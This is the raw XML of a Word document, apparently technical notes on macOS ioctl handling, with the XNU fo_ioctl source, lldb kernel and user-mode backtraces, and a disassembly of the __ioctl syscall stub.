    <w:p w:rsidR="006B36DE" w:rsidRDefault="006B36DE" w:rsidP="006B36DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_Toc445313376"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00362D2C" w:rsidRDefault="00362D2C" w:rsidP="00362D2C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc445313377"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kernel mode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w:rsidR="00157867" w:rsidRDefault="00157867" w:rsidP="00D1581D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fo_ioctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fileproc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>u_long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>caddr_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vfs_context_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proc_fdunlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vfs_context_proc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_ops</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fo_ioctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ctx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proc_fdlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vfs_context_proc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ctx</w:t>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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C2CBA" w:rsidRPr="00D1581D" w:rsidRDefault="00157867" w:rsidP="00D15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D1581D">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C2CBA" w:rsidRPr="00D1581D">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(lldb) b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thread #5: tid = 0x1aec, 0xffffff8017d5a750 kernel.development`fo_ioctl(fp=0xffffff80208568f8, com=2148034564, data="@??S?, ctx=0xffffff888147be88) at kern_descrip.c:5827, name = '0xffffff802886da80', queue = '0x0', stop reason = breakpoint 6.1</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 frame #0: 0xffffff8017d5a750</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2CBA">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2CBA">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kernel.development`fo_ioctl</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2CBA">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(fp=0xffffff80208568f8, com=2148034564, data="@??S?, ctx=0xffffff888147be88) at kern_descrip.c:5827 [op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 0xffffff8017d9ca61 kernel.development`ioctl(p=0xffffff8024b15108, uap=0xffffff802888e000, retval=&lt;unavailable&gt;) + 1409 at sys_generic.c:914 [op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 0xffffff8017dfdbef kernel.development`unix_syscall64(state=0xffffff80288333a0) + 703 at systemcalls.c:384 [op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 0xffffff80179b94f6 kernel.development`hndl_unix_scall64 + 2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lldb) </w:t>
      </w:r>
    </w:p>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0C2CBA" w:rsidRDefault="000C2CBA" w:rsidP="000C2CBA"/>
    <w:p w:rsidR="00362D2C" w:rsidRDefault="00362D2C" w:rsidP="00362D2C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Toc445313378"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User mode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>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lldb) dis</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libsystem_kernel.dylib`__ioctl:</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gt;  0x7fff8ac6697c &lt;+0&gt;:  mov    eax, 0x2000036</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81 &lt;+5&gt;:  mov    r10, rcx</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color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C2CBA">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">    0x7fff8ac66984 &lt;+8&gt;:  syscall </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86 &lt;+10&gt;: jae    0x7fff8ac66990            ; &lt;+20&g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88 &lt;+12&gt;: mov    rdi, rax</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8b &lt;+15&gt;: jmp    0x7fff8ac61c02            ; cerror</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90 &lt;+20&gt;: ret    </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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fff8ac66991 &lt;+21&gt;: nop    </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92 &lt;+22&gt;: nop    </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0x7fff8ac66993 &lt;+23&gt;: nop    </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lldb) bt</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thread #1: tid = 0x2fec, 0x00007fff8ac6697c libsystem_kernel.dylib`__ioctl, queue = 'IDSBatchIDQueryControllerQueue', stop reason = breakpoint 2.1</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 frame #0: 0x00007fff8ac6697c </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2CBA">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>libsystem_kernel.dylib`__ioctl</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 0x00007fff8ac640d2 libsystem_kernel.dylib`ioctl + 159</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 0x00007fff925d8372 libsystem_network.dylib`nw_interface_create_with_index_and_name + 289</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 0x00007fff925d8be7 libsystem_network.dylib`nw_interface_create_with_index + 195</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4: 0x00007fff925cabf7 libsystem_network.dylib`nw_path_create_evaluator_for_helper_client_id + 2855</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5: 0x00007fff95cf8f1b SystemConfiguration`__SCNetworkReachabilitySetDispatchQueue + 126</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6: 0x00007fff95d08c7b SystemConfiguration`SCNetworkReachabilitySetDispatchQueue + 107</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7: 0x00007fff93e8da3c IMFoundation`___lldb_unnamed_function1161$$IMFoundation + 25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8: 0x00007fff93e8dcc7 IMFoundation`___lldb_unnamed_function1164$$IMFoundation + 258</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9: 0x00007fff93e8e561 IMFoundation`___lldb_unnamed_function1203$$IMFoundation + 15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0: 0x00007fff93e8e1c4 IMFoundation`___lldb_unnamed_function1186$$IMFoundation + 129</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1: 0x00007fff93a6a15a IDSFoundation`___lldb_unnamed_function207$$IDSFoundation + 143</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2: 0x00007fff93a62c69 IDSFoundation`___lldb_unnamed_function5$$IDSFoundation + 163</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3: 0x00007fff93a62b7e IDSFoundation`___lldb_unnamed_function2$$IDSFoundation + 120</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4: 0x00007fff921c867b IDS`___lldb_unnamed_function1096$$IDS + 34</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5: 0x00007fff921c7002 IDS`___lldb_unnamed_function1075$$IDS + 26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6: 0x00007fff8928433f libdispatch.dylib`_dispatch_client_callout + 8</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7: 0x00007fff89285926 libdispatch.dylib`_dispatch_barrier_sync_f_invoke + 74</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18: 0x00007fff921b329e IDS`___lldb_unnamed_function660$$IDS + 8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #19: 0x0000000102295eef FaceTime`___lldb_unnamed_function1029$$FaceTime + 112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0: 0x0000000102268ac5 FaceTime`___lldb_unnamed_function266$$FaceTime + 386</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1: 0x00000001022f8ee6 FaceTime`___lldb_unnamed_function2773$$FaceTime + 95</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2: 0x00007fff8928f871 libdispatch.dylib`_dispatch_call_block_and_release + 1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3: 0x00007fff8928433f libdispatch.dylib`_dispatch_client_callout + 8</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4: 0x00007fff89297c1d libdispatch.dylib`_dispatch_main_queue_callback_4CF + 1685</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5: 0x00007fff8bc4dcd9 CoreFoundation`__CFRUNLOOP_IS_SERVICING_THE_MAIN_DISPATCH_QUEUE__ + 9</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6: 0x00007fff8bc08d3d CoreFoundation`__CFRunLoopRun + 1949</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7: 0x00007fff8bc08338 CoreFoundation`CFRunLoopRunSpecific + 296</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8: 0x00007fff92ff2935 HIToolbox`RunCurrentEventLoopInMode + 235</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29: 0x00007fff92ff276f HIToolbox`ReceiveNextEventCommon + 43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0: 0x00007fff92ff25af HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71</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1: 0x00007fff979e30ee AppKit`_DPSNextEvent + 1067</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2: 0x00007fff97daf943 AppKit`-[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] + 454</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3: 0x00007fff979d8fc8 AppKit`-[NSApplication run] + 682</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4: 0x00007fff9795b520 AppKit`NSApplicationMain + 1176</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5: 0x00007fff92b9c5ad libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C2CBA" w:rsidRPr="000C2CBA"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 xml:space="preserve">    frame #36: 0x00007fff92b9c5ad libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRPr="00514545" w:rsidRDefault="000C2CBA" w:rsidP="000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Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C2CBA">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(lldb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="00D93C14" w:rsidRDefault="00D93C14" w:rsidP="00D93C14">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Graphics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D93C14" w:rsidRPr="006D0E0F" w:rsidRDefault="00D93C14" w:rsidP="00D93C14"/>
    <w:p w:rsidR="00D93C14" w:rsidRDefault="00D93C14" w:rsidP="00D93C14">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Overview </w:t>
      </w:r>
    </w:p>
